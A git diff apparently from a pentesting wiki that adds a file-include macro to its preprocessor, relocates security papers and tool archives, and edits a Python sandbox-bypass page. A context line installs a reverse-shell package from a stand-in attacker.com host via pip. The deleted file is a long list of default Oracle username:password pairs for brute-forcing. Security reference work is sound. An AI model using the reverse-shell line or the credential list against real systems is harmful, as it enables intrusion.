diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
index b3186537d..969d5333e 100644
--- a/hacktricks-preprocessor.py
+++ b/hacktricks-preprocessor.py
@@ -1,4 +1,5 @@
import json
+import os
import sys
import re
import logging
@@ -68,6 +69,33 @@ def ref(matchobj):
return result
+def files(matchobj):
+ logger.debug(f'Files match: {matchobj.groups(0)[0].strip()}')
+ href = matchobj.groups(0)[0].strip()
+ title = ""
+
+ try:
+ for root, dirs, files in os.walk(os.getcwd()+'/src/files'):
+ if href in files:
+ title = href
+ logger.debug(f'File search result: {os.path.join(root, href)}')
+
+ except Exception as e:
+ logger.debug(e)
+ logger.debug(f'Error searching file: {href}')
+ print(f'Error searching file: {href}')
+ sys.exit(1)
+
+ if title=="":
+ logger.debug(f'Error searching file: {href}')
+ print(f'Error searching file: {href}')
+ sys.exit(1)
+
+ template = f"""{title}"""
+
+ result = template
+
+ return result
def add_read_time(content):
regex = r'(<\/style>\n# .*(?=\n))'
@@ -105,6 +133,8 @@ if __name__ == '__main__':
current_chapter = chapter
regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'
new_content = re.sub(regex, ref, chapter['content'])
+ regex = r'{{[\s]*#file[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endfile[\s]*}}'
+ new_content = re.sub(regex, files, chapter['content'])
new_content = add_read_time(new_content)
chapter['content'] = new_content
diff --git a/src/images/CTX_WSUSpect_White_Paper (1).pdf b/src/files/CTX_WSUSpect_White_Paper (1).pdf
similarity index 100%
rename from src/images/CTX_WSUSpect_White_Paper (1).pdf
rename to src/files/CTX_WSUSpect_White_Paper (1).pdf
diff --git a/src/images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf b/src/files/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
similarity index 100%
rename from src/images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
rename to src/files/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
diff --git a/src/images/EN-Local-File-Inclusion-1.pdf b/src/files/EN-Local-File-Inclusion-1.pdf
similarity index 100%
rename from src/images/EN-Local-File-Inclusion-1.pdf
rename to src/files/EN-Local-File-Inclusion-1.pdf
diff --git a/src/images/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf b/src/files/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf
similarity index 100%
rename from src/images/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf
rename to src/files/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf
diff --git a/src/images/LFI-With-PHPInfo-Assistance.pdf b/src/files/LFI-With-PHPInfo-Assistance.pdf
similarity index 100%
rename from src/images/LFI-With-PHPInfo-Assistance.pdf
rename to src/files/LFI-With-PHPInfo-Assistance.pdf
diff --git a/src/images/Reverse.tar (1).gz b/src/files/Reverse.tar (1).gz
similarity index 100%
rename from src/images/Reverse.tar (1).gz
rename to src/files/Reverse.tar (1).gz
diff --git a/src/images/app-release.zip b/src/files/app-release.zip
similarity index 100%
rename from src/images/app-release.zip
rename to src/files/app-release.zip
diff --git a/src/images/epmd_bf-0.1.tar.bz2 b/src/files/epmd_bf-0.1.tar.bz2
similarity index 100%
rename from src/images/epmd_bf-0.1.tar.bz2
rename to src/files/epmd_bf-0.1.tar.bz2
diff --git a/src/images/iisfinal.txt b/src/files/iisfinal.txt
similarity index 100%
rename from src/images/iisfinal.txt
rename to src/files/iisfinal.txt
diff --git a/src/images/moodle-rce-plugin.zip b/src/files/moodle-rce-plugin.zip
similarity index 100%
rename from src/images/moodle-rce-plugin.zip
rename to src/files/moodle-rce-plugin.zip
diff --git a/src/images/pgsql_exec.zip b/src/files/pgsql_exec.zip
similarity index 100%
rename from src/images/pgsql_exec.zip
rename to src/files/pgsql_exec.zip
diff --git a/src/images/posts.txt b/src/files/posts.txt
similarity index 100%
rename from src/images/posts.txt
rename to src/files/posts.txt
diff --git a/src/images/sqli-hashbypass.txt b/src/files/sqli-hashbypass.txt
similarity index 100%
rename from src/images/sqli-hashbypass.txt
rename to src/files/sqli-hashbypass.txt
diff --git a/src/images/vncpwd.zip b/src/files/vncpwd.zip
similarity index 100%
rename from src/images/vncpwd.zip
rename to src/files/vncpwd.zip
diff --git a/src/images/vpnIDs.txt b/src/files/vpnIDs.txt
similarity index 100%
rename from src/images/vpnIDs.txt
rename to src/files/vpnIDs.txt
diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
index 20e536371..4918e6c84 100644
--- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
+++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
@@ -2,7 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
These are some tricks to bypass python sandbox protections and execute arbitrary commands.
## Command Execution Libraries
@@ -44,8 +43,7 @@ system('ls')
Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox.
-> [!CAUTION]
-> **Python2 input()** function allows executing python code before the program crashes.
+> [!CAUTION] > **Python2 input()** function allows executing python code before the program crashes.
Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
@@ -87,7 +85,9 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
-{% file src="../../../images/Reverse.tar (1).gz" %}
+{{#file}}
+Reverse.tar (1).gz
+{{#endfile}}
> [!NOTE]
> This package is called `Reverse`. However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
@@ -1145,8 +1145,4 @@ will be bypassed
- [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)
- [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/images/CTX_WSUSpect_White_Paper.pdf b/src/images/CTX_WSUSpect_White_Paper.pdf
deleted file mode 100644
index d152ec3a5..000000000
Binary files a/src/images/CTX_WSUSpect_White_Paper.pdf and /dev/null differ
diff --git a/src/images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection (1).pdf b/src/images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection (1).pdf
deleted file mode 100644
index a58ea2462..000000000
Binary files a/src/images/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection (1).pdf and /dev/null differ
diff --git a/src/images/EN-Local-File-Inclusion-1 (1).pdf b/src/images/EN-Local-File-Inclusion-1 (1).pdf
deleted file mode 100644
index 588a75f7f..000000000
Binary files a/src/images/EN-Local-File-Inclusion-1 (1).pdf and /dev/null differ
diff --git a/src/images/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1 (1).pdf b/src/images/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1 (1).pdf
deleted file mode 100644
index 3b49b5d5a..000000000
Binary files a/src/images/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1 (1).pdf and /dev/null differ
diff --git a/src/images/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf b/src/images/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf
deleted file mode 100644
index 3b49b5d5a..000000000
Binary files a/src/images/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf and /dev/null differ
diff --git a/src/images/EN-PHP-loose-comparison-Type-Juggling-OWASP.pdf b/src/images/EN-PHP-loose-comparison-Type-Juggling-OWASP.pdf
deleted file mode 100644
index f69e63464..000000000
Binary files a/src/images/EN-PHP-loose-comparison-Type-Juggling-OWASP.pdf and /dev/null differ
diff --git a/src/images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf b/src/images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf
deleted file mode 100644
index 9eacd6556..000000000
Binary files a/src/images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15 (1).pdf and /dev/null differ
diff --git a/src/images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf b/src/images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf
deleted file mode 100644
index 9eacd6556..000000000
Binary files a/src/images/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf and /dev/null differ
diff --git a/src/images/LFI-With-PHPInfo-Assistance (1).pdf b/src/images/LFI-With-PHPInfo-Assistance (1).pdf
deleted file mode 100644
index 3525b48e7..000000000
Binary files a/src/images/LFI-With-PHPInfo-Assistance (1).pdf and /dev/null differ
diff --git a/src/images/Reverse.tar.gz b/src/images/Reverse.tar.gz
deleted file mode 100644
index 3d8a63206..000000000
Binary files a/src/images/Reverse.tar.gz and /dev/null differ
diff --git a/src/images/ctx_wsuspect_white_paper (1).pdf b/src/images/ctx_wsuspect_white_paper (1).pdf
deleted file mode 100644
index d152ec3a5..000000000
Binary files a/src/images/ctx_wsuspect_white_paper (1).pdf and /dev/null differ
diff --git a/src/images/ctx_wsuspect_white_paper.pdf b/src/images/ctx_wsuspect_white_paper.pdf
deleted file mode 100644
index d152ec3a5..000000000
Binary files a/src/images/ctx_wsuspect_white_paper.pdf and /dev/null differ
diff --git a/src/images/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf b/src/images/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf
deleted file mode 100644
index a58ea2462..000000000
Binary files a/src/images/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf and /dev/null differ
diff --git a/src/images/en-local-file-inclusion-1.pdf b/src/images/en-local-file-inclusion-1.pdf
deleted file mode 100644
index 588a75f7f..000000000
Binary files a/src/images/en-local-file-inclusion-1.pdf and /dev/null differ
diff --git a/src/images/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf b/src/images/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf
deleted file mode 100644
index 3b49b5d5a..000000000
Binary files a/src/images/en-nosql-no-injection-ron-shulman-peleg-bronshtein-1.pdf and /dev/null differ
diff --git a/src/images/en-php-loose-comparison-type-juggling-owasp (1).pdf b/src/images/en-php-loose-comparison-type-juggling-owasp (1).pdf
deleted file mode 100644
index f69e63464..000000000
Binary files a/src/images/en-php-loose-comparison-type-juggling-owasp (1).pdf and /dev/null differ
diff --git a/src/images/en-php-loose-comparison-type-juggling-owasp.pdf b/src/images/en-php-loose-comparison-type-juggling-owasp.pdf
deleted file mode 100644
index f69e63464..000000000
Binary files a/src/images/en-php-loose-comparison-type-juggling-owasp.pdf and /dev/null differ
diff --git a/src/images/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf b/src/images/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf
deleted file mode 100644
index 9eacd6556..000000000
Binary files a/src/images/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf and /dev/null differ
diff --git a/src/images/final-oracle-accs.txt b/src/images/final-oracle-accs.txt
deleted file mode 100644
index 7e1932c44..000000000
--- a/src/images/final-oracle-accs.txt
+++ /dev/null
@@ -1,1578 +0,0 @@
-AASH:AASH
-ABA1:ABA1
-abm:abm
-ABM:ABM
-adams:wood
-ADAMS:WOOD
-adldemo:adldemo
-ADLDEMO:ADLDEMO
-administrator:admin
-ADMINISTRATOR:ADMIN
-administrator:administrator
-ADMINISTRATOR:ADMINISTRATOR
-admin:jetspeed
-ADMIN:JETSPEED
-admin:welcome
-ADMIN:WELCOME
-AD_MONITOR:LIZARD
-ADS:ADS
-ADSEUL_US:WELCOME
-ahl:ahl
-AHL:AHL
-ahm:ahm
-AHM:AHM
-ak:ak
-AK:AK
-ALA1:ALA1
-AL:AL
-alhro:xxx
-ALHRO:XXX
-alhrw:xxx
-ALHRW:XXX
-ALLUSERS:ALLUSERS
-alr:alr
-ALR:ALR
-AMA1:AMA1
-AMA2:AMA2
-AMA3:AMA3
-AMA4:AMA4
-AMF:AMF
-AMS1:AMS1
-AMS2:AMS2
-AMS3:AMS3
-AMS4:AMS4
-ams:ams
-AMS:AMS
-AMSYS:AMSYS
-amv:amv
-AMV:AMV
-AMW:AMW
-andy:swordfish
-ANDY:SWORDFISH
-ANNE:ANNE
-anonymous:anonymous
-ANONYMOUS:ANONYMOUS
-AOLDEMO:AOLDEMO
-APA1:APA1
-APA2:APA2
-APA3:APA3
-APA4:APA4
-ap:ap
-AP:AP
-APPLEAD:APPLEAD
-applmgr:applmgr
-APPLMGR:APPLMGR
-applsys:applsys
-APPLSYS:APPLSYS
-applsys:apps
-APPLSYS:APPS
-applsys:fnd
-APPLSYS:FND
-applsyspub:applsyspub
-APPLSYSPUB:APPLSYSPUB
-applsyspub:fndpub
-APPLSYSPUB:FNDPUB
-applsyspub:pub
-APPLSYSPUB:PUB
-applysyspub:fndpub
-APPLYSYSPUB:FNDPUB
-applysyspub:pub
-APPLYSYSPUB:PUB
-apps:apps
-APPS:APPS
-apps_mrc:apps
-APPS_MRC:APPS
-appuser:apppassword
-APPUSER:APPPASSWORD
-APS1:APS1
-APS2:APS2
-APS3:APS3
-APS4:APS4
-aq:aq
-AQ:AQ
-aqdemo:aqdemo
-AQDEMO:AQDEMO
-aqjava:aqjava
-AQJAVA:AQJAVA
-aquser:aquser
-AQUSER:AQUSER
-ARA1:ARA1
-ARA2:ARA2
-ARA3:ARA3
-ARA4:ARA4
-ar:ar
-AR:AR
-ARS1:ARS1
-ARS2:ARS2
-ARS3:ARS3
-ARS4:ARS4
-ART:ART
-asf:asf
-ASF:ASF
-asg:asg
-ASG:ASG
-asl:asl
-ASL:ASL
-ASN:ASN
-aso:aso
-ASO:ASO
-asp:asp
-ASP:ASP
-ast:ast
-AST:AST
-atm:sampleatm
-ATM:SAMPLEATM
-AUC_GUEST:AUC_GUEST
-audiouser:audiouser
-AUDIOUSER:AUDIOUSER
-aurora$jis$utility$:invalid
-AURORA$JIS$UTILITY$:INVALID
-aurora$orb$unauthenticated:invalid
-AURORA$ORB$UNAUTHENTICATED:INVALID
-AUTHORIA:AUTHORIA
-ax:ax
-AX:AX
-az:az
-AZ:AZ
-B2B:B2B
-BAM:BAM
-bc4j:bc4j
-BC4J:BC4J
-BCA1:BCA1
-BCA2:BCA2
-ben:ben
-BEN:BEN
-bic:bic
-BIC:BIC
-bil:bil
-BIL:BIL
-bim:bim
-BIM:BIM
-bis:bis
-BIS:BIS
-biv:biv
-BIV:BIV
-bix:bix
-BIX:BIX
-blake:paper
-BLAKE:PAPER
-blewis:blewis
-BLEWIS:BLEWIS
-BMEADOWS:BMEADOWS
-BNE:BNE
-bom:bom
-BOM:BOM
-BP01:BP01
-BP02:BP02
-BP03:BP03
-BP04:BP04
-BP05:BP05
-BP06:BP06
-brio_admin:brio_admin
-BRIO_ADMIN:BRIO_ADMIN
-brugernavn:adgangskode
-BRUGERNAVN:ADGANGSKODE
-brukernavn:password
-BRUKERNAVN:PASSWORD
-bsc:bsc
-BSC:BSC
-bug_reports:bug_reports
-BUG_REPORTS:BUG_REPORTS
-BUYACCT:BUYACCT
-BUYAPPR1:BUYAPPR1
-BUYAPPR2:BUYAPPR2
-BUYAPPR3:BUYAPPR3
-BUYER:BUYER
-BUYMTCH:BUYMTCH
-calvin:hobbes
-CALVIN:HOBBES
-CAMRON:CAMRON
-CANDICE:CANDICE
-CARL:CARL
-CARLY:CARLY
-CARMEN:CARMEN
-CARRIECONYERS:CARRIECONYERS
-CATADMIN:CATADMIN
-catalog:catalog
-CATALOG:CATALOG
-cct:cct
-CCT:CCT
-cdemo82:cdemo82
-CDEMO82:CDEMO82
-cdemo82:cdemo83
-CDEMO82:CDEMO83
-cdemo82:unknown
-CDEMO82:UNKNOWN
-cdemocor:cdemocor
-CDEMOCOR:CDEMOCOR
-cdemorid:cdemorid
-CDEMORID:CDEMORID
-cdemoucb:cdemoucb
-CDEMOUCB:CDEMOUCB
-cdouglas:cdouglas
-CDOUGLAS:CDOUGLAS
-CEASAR:CEASAR
-ce:ce
-CE:CE
-centra:centra
-CENTRA:CENTRA
-central:central
-CENTRAL:CENTRAL
-CFD:CFD
-CHANDRA:CHANDRA
-CHARLEY:CHARLEY
-CHRISBAKER:CHRISBAKER
-CHRISTIE:CHRISTIE
-cids:cids
-CIDS:CIDS
-CINDY:CINDY
-cis:cis
-CIS:CIS
-cisinfo:cisinfo
-CISINFO:CISINFO
-cisinfo:zwerg
-CISINFO:ZWERG
-cis:zwerg
-CIS:ZWERG
-CLARK:CLARK
-clark:cloth
-CLARK:CLOTH
-CLAUDE:CLAUDE
-CLINT:CLINT
-CLN:CLN
-CNCADMIN:CNCADMIN
-cn:cn
-CN:CN
-company:company
-COMPANY:COMPANY
-compiere:compiere
-COMPIERE:COMPIERE
-CONNIE:CONNIE
-CONNOR:CONNOR
-CORY:CORY
-cqschemauser:password
-CQSCHEMAUSER:PASSWORD
-cquserdbuser:password
-CQUSERDBUSER:PASSWORD
-CRM1:CRM1
-CRM2:CRM2
-CRPB733:CRPB733
-crp:crp
-CRP:CRP
-CRPCTL:CRPCTL
-CRPDTA:CRPDTA
-CSADMIN:CSADMIN
-CSAPPR1:CSAPPR1
-csc:csc
-CSC:CSC
-cs:cs
-CS:CS
-csd:csd
-CSD:CSD
-CSDUMMY:CSDUMMY
-cse:cse
-CSE:CSE
-csf:csf
-CSF:CSF
-csi:csi
-CSI:CSI
-csl:csl
-CSL:CSL
-CSM:CSM
-csmig:csmig
-CSMIG:CSMIG
-csp:csp
-CSP:CSP
-csr:csr
-CSR:CSR
-css:css
-CSS:CSS
-ctxdemo:ctxdemo
-CTXDEMO:CTXDEMO
-ctxsys:change_on_install
-CTXSYS:CHANGE_ON_INSTALL
-ctxsys:ctxsys
-CTXSYS:CTXSYS
-ctxsys:unknown
-CTXSYS:UNKNOWN
-CTXTEST:CTXTEST
-cua:cua
-CUA:CUA
-cue:cue
-CUE:CUE
-cuf:cuf
-CUF:CUF
-cug:cug
-CUG:CUG
-cui:cui
-CUI:CUI
-cun:cun
-CUN:CUN
-cup:cup
-CUP:CUP
-cus:cus
-CUS:CUS
-cz:cz
-CZ:CZ
-data_schema:laskjdf098ksdaf09
-DATA_SCHEMA:LASKJDF098KSDAF09
-DAVIDMORGAN:DAVIDMORGAN
-dbi:mumblefratz
-DBI:MUMBLEFRATZ
-dbsnmp:dbsnmp
-DBSNMP:DBSNMP
-dbvision:dbvision
-DBVISION:DBVISION
-DCM:DCM
-DD7333:DD7333
-DD7334:DD7334
-DD810:DD810
-DD811:DD811
-DD812:DD812
-DD9:DD9
-DDB733:DDB733
-DDD:DDD
-ddic:199220706
-DDIC:199220706
-demo8:demo8
-DEMO8:DEMO8
-demo9:demo9
-DEMO9:DEMO9
-demo:demo
-DEMO:DEMO
-des2k:des2k
-DES2K:DES2K
-des:des
-DES:DES
-dev2000_demos:dev2000_demos
-DEV2000_DEMOS:DEV2000_DEMOS
-DEVB733:DEVB733
-DEVUSER:DEVUSER
-DGRAY:WELCOME
-diane:passwo1
-DIANE:PASSWO1
-dip:dip
-DIP:DIP
-DISCOVERER5:DISCOVERER5
-discoverer_admin:discoverer_admin
-DISCOVERER_ADMIN:DISCOVERER_ADMIN
-DKING:DKING
-DLD:DLD
-DMADMIN:MANAGER
-DMATS:DMATS
-DMS:DMS
-dmsys:dmsys
-DMSYS:DMSYS
-DOM:DOM
-dpf:dpfpass
-DPF:DPFPASS
-DPOND:DPOND
-dsgateway:dsgateway
-DSGATEWAY:DSGATEWAY
-dssys:dssys
-DSSYS:DSSYS
-dtsp:dtsp
-DTSP:DTSP
-DV7333:DV7333
-DV7334:DV7334
-DV810:DV810
-DV811:DV811
-DV812:DV812
-DV9:DV9
-DVP1:DVP1
-eaa:eaa
-EAA:EAA
-eam:eam
-EAM:EAM
-earlywatch:support
-EARLYWATCH:SUPPORT
-east:east
-EAST:EAST
-ec:ec
-EC:EC
-ecx:ecx
-ECX:ECX
-EDR:EDR
-EDWEUL_US:EDWEUL_US
-EDWREP:EDWREP
-EGC1:EGC1
-EGD1:EGD1
-EGM1:EGM1
-EGO:EGO
-EGR1:EGR1
-ejb:ejb
-EJB:EJB
-ejsadmin:ejsadmin
-EJSADMIN:EJSADMIN
-ejsadmin:ejsadmin_password
-EJSADMIN:EJSADMIN_PASSWORD
-emp:emp
-EMP:EMP
-END1:END1
-eng:eng
-ENG:ENG
-eni:eni
-ENI:ENI
-ENM1:ENM1
-ENS1:ENS1
-ENTMGR_CUST:ENTMGR_CUST
-ENTMGR_PRO:ENTMGR_PRO
-ENTMGR_TRAIN:ENTMGR_TRAIN
-EOPP_PORTALADM:EOPP_PORTALADM
-EOPP_PORTALMGR:EOPP_PORTALMGR
-EOPP_USER:EOPP_USER
-estoreuser:estore
-ESTOREUSER:ESTORE
-EUL_US:EUL_US
-event:event
-EVENT:EVENT
-evm:evm
-EVM:EVM
-EXA1:EXA1
-EXA2:EXA2
-EXA3:EXA3
-EXA4:EXA4
-example:example
-EXAMPLE:EXAMPLE
-exfsys:exfsys
-EXFSYS:EXFSYS
-EXS1:EXS1
-EXS2:EXS2
-EXS3:EXS3
-EXS4:EXS4
-extdemo2:extdemo2
-EXTDEMO2:EXTDEMO2
-extdemo:extdemo
-EXTDEMO:EXTDEMO
-fa:fa
-FA:FA
-fem:fem
-FEM:FEM
-FIA1:FIA1
-fii:fii
-FII:FII
-finance:finance
-FINANCE:FINANCE
-finprod:finprod
-FINPROD:FINPROD
-flm:flm
-FLM:FLM
-fnd:fnd
-FND:FND
-FNI1:FNI1
-FNI2:FNI2
-foo:bar
-FOO:BAR
-FPA:FPA
-fpt:fpt
-FPT:FPT
-frm:frm
-FRM:FRM
-frosty:snowman
-FROSTY:SNOWMAN
-FTA1:FTA1
-fte:fte
-FTE:FTE
-FUN:FUN
-fv:fv
-FV:FV
-FVP1:FVP1
-GALLEN:GALLEN
-GCA1:GCA1
-GCA2:GCA2
-GCA3:GCA3
-GCA9:GCA9
-GCMGR1:GCMGR1
-GCMGR2:GCMGR2
-GCMGR3:GCMGR3
-GCS1:GCS1
-GCS2:GCS2
-GCS3:GCS3
-GCS:GCS
-GEORGIAWINE:GEORGIAWINE
-GLA1:GLA1
-GLA2:GLA2
-GLA3:GLA3
-GLA4:GLA4
-gl:gl
-GL:GL
-GLS1:GLS1
-GLS2:GLS2
-GLS3:GLS3
-GLS4:GLS4
-gma:gma
-GMA:GMA
-GM_AWDA:GM_AWDA
-GM_COPI:GM_COPI
-gmd:gmd
-GMD:GMD
-GM_DPHD:GM_DPHD
-gme:gme
-GME:GME
-gmf:gmf
-GMF:GMF
-gmi:gmi
-GMI:GMI
-gml:gml
-GML:GML
-GM_MLCT:GM_MLCT
-gmp:gmp
-GMP:GMP
-GM_PLADMA:GM_PLADMA
-GM_PLADMH:GM_PLADMH
-GM_PLCCA:GM_PLCCA
-GM_PLCCH:GM_PLCCH
-GM_PLCOMA:GM_PLCOMA
-GM_PLCOMH:GM_PLCOMH
-GM_PLCONA:GM_PLCONA
-GM_PLCONH:GM_PLCONH
-GM_PLNSCA:GM_PLNSCA
-GM_PLNSCH:GM_PLNSCH
-GM_PLSCTA:GM_PLSCTA
-GM_PLSCTH:GM_PLSCTH
-GM_PLVET:GM_PLVET
-gms:gms
-GMS:GMS
-GM_SPO:GM_SPO
-GM_STKH:GM_STKH
-gpfd:gpfd
-GPFD:GPFD
-gpld:gpld
-GPLD:GPLD
-gr:gr
-GR:GR
-GUEST:GUEST
-hades:hades
-HADES:HADES
-HCC:HCC
-hcpark:hcpark
-HCPARK:HCPARK
-HHCFO:HHCFO
-hlw:hlw
-HLW:HLW
-hr:change_on_install
-HR:CHANGE_ON_INSTALL
-hr:hr
-HR:HR
-hri:hri
-HRI:HRI
-hr:unknown
-HR:UNKNOWN
-hvst:hvst
-HVST:HVST
-hxc:hxc
-HXC:HXC
-hxt:hxt
-HXT:HXT
-IA:IA
-iba:iba
-IBA:IBA
-IBC:IBC
-ibe:ibe
-IBE:IBE
-ibp:ibp
-IBP:IBP
-ibu:ibu
-IBU:IBU
-iby:iby
-IBY:IBY
-icdbown:icdbown
-ICDBOWN:ICDBOWN
-icx:icx
-ICX:ICX
-idemo_user:idemo_user
-IDEMO_USER:IDEMO_USER
-ieb:ieb
-IEB:IEB
-iec:iec
-IEC:IEC
-iem:iem
-IEM:IEM
-ieo:ieo
-IEO:IEO
-ies:ies
-IES:IES
-ieu:ieu
-IEU:IEU
-iex:iex
-IEX:IEX
-ifssys:ifssys
-IFSSYS:IFSSYS
-igc:igc
-IGC:IGC
-igf:igf
-IGF:IGF
-igi:igi
-IGI:IGI
-igs:igs
-IGS:IGS
-igw:igw
-IGW:IGW
-imageuser:imageuser
-IMAGEUSER:IMAGEUSER
-imc:imc
-IMC:IMC
-imedia:imedia
-IMEDIA:IMEDIA
-imt:imt
-IMT:IMT
-INS1:INS1
-INS2:INS2
-#internal:oracle
-internal:oracle
-#INTERNAL:ORACLE
-INTERNAL:ORACLE
-#internal:sys_stnt
-internal:sys_stnt
-#INTERNAL:SYS_STNT
-INTERNAL:SYS_STNT
-inv:inv
-INV:INV
-ipa:ipa
-IPA:IPA
-ipd:ipd
-IPD:IPD
-IP:IP
-iplanet:iplanet
-IPLANET:IPLANET
-isc:isc
-ISC:ISC
-ISTEWARD:ISTEWARD
-itg:itg
-ITG:ITG
-ja:ja
-JA:JA
-jake:passwo4
-JAKE:PASSWO4
-JD7333:JD7333
-JD7334:JD7334
-JD9:JD9
-JDEDBA:JDEDBA
-JDE:JDE
-je:je
-JE:JE
-jg:jg
-JG:JG
-jill:passwo2
-JILL:PASSWO2
-jl:jl:
-JL :JL
-JL:JL
-jmuser:jmuser
-JMUSER:JMUSER
-JOHNINARI:JOHNINARI
-john:john
-JOHN:JOHN
-jones:steel
-JONES:STEEL
-jtf:jtf
-JTF:JTF
-JTI:JTI
-jtm:jtm
-JTM:JTM
-JTR:JTR
-jts:jts
-JTS:JTS
-JUNK_PS:JUNK_PS
-JUSTOSHUM:JUSTOSHUM
-jward:airoplane
-JWARD:AIROPLANE
-KELLYJONES:KELLYJONES
-KEVINDONS:KEVINDONS
-KPN:KPN
-kwalker:kwalker
-KWALKER:KWALKER
-l2ldemo:l2ldemo
-L2LDEMO:L2LDEMO
-LADAMS:LADAMS
-lbacsys:lbacsys
-LBACSYS:LBACSYS
-LBA:LBA
-LDQUAL:LDQUAL
-LHILL:LHILL
-librarian:shelves
-LIBRARIAN:SHELVES
-LNS:LNS
-LQUINCY:LQUINCY
-LSA:LSA
-manprod:manprod
-MANPROD:MANPROD
-mark:passwo3
-MARK:PASSWO3
-mascarm:manager
-MASCARM:MANAGER
-master:password
-MASTER:PASSWORD
-mddata:mddata
-MDDATA:MDDATA
-mddemo_clerk:clerk
-MDDEMO_CLERK:CLERK
-mddemo_clerk:mgr
-MDDEMO_CLERK:MGR
-mddemo:mddemo
-MDDEMO:MDDEMO
-mddemo_mgr:mddemo_mgr
-MDDEMO_MGR:MDDEMO_MGR
-mddemo_mgr:mgr
-MDDEMO_MGR:MGR
-mdsys:mdsys
-MDSYS:MDSYS
-MDSYS:SYS
-me:me
-ME:ME
-mfg:mfg
-MFG:MFG
-MGR1:MGR1
-MGR2:MGR2
-MGR3:MGR3
-MGR4:MGR4
-mgr:mgr
-MGR:MGR
-mgwuser:mgwuser
-MGWUSER:MGWUSER
-migrate:migrate
-MIGRATE:MIGRATE
-MIKEIKEGAMI:MIKEIKEGAMI
-miller:miller
-MILLER:MILLER
-MJONES:MJONES
-MLAKE:MLAKE
-MM1:MM1
-MM2:MM2
-MM3:MM3
-MM4:MM4
-MM5:MM5
-MMARTIN:MMARTIN
-mmo2:mmo2
-MMO2:MMO2
-mmo2:mmo3
-MMO2:MMO3
-mmo2:unknown
-MMO2:UNKNOWN
-MOBILEADMIN:WELCOME
-modtest:yes
-MODTEST:YES
-moreau:moreau
-MOREAU:MOREAU
-mrp:mrp
-MRP:MRP
-msc:msc
-MSC:MSC
-msd:msd
-MSD:MSD
-mso:mso
-MSO:MSO
-msr:msr
-MSR:MSR
-MST:MST
-mtssys:mtssys
-MTSSYS:MTSSYS
-mts_user:mts_password
-MTS_USER:MTS_PASSWORD
-mwa:mwa
-MWA:MWA
-mxagent:mxagent
-MXAGENT:MXAGENT
-names:names
-NAMES:NAMES
-NEILKATSU:NEILKATSU
-neotix_sys:neotix_sys
-NEOTIX_SYS:NEOTIX_SYS
-nneul:nneulpass
-NNEUL:NNEULPASS
-nomeutente:password
-NOMEUTENTE:PASSWORD
-nome_utilizador:senha
-NOME_UTILIZADOR:SENHA
-nom_utilisateur:mot_de_passe
-NOM_UTILISATEUR:MOT_DE_PASSE
-nume_utilizator:parol
-NUME_UTILIZATOR:PAROL
-oas_public:oas_public
-OAS_PUBLIC:OAS_PUBLIC
-OBJ7333:OBJ7333
-OBJ7334:OBJ7334
-OBJB733:OBJB733
-OCA:OCA
-ocitest:ocitest
-OCITEST:OCITEST
-ocm_db_admin:ocm_db_admin
-OCM_DB_ADMIN:OCM_DB_ADMIN
-odm_mtr:mtrpw
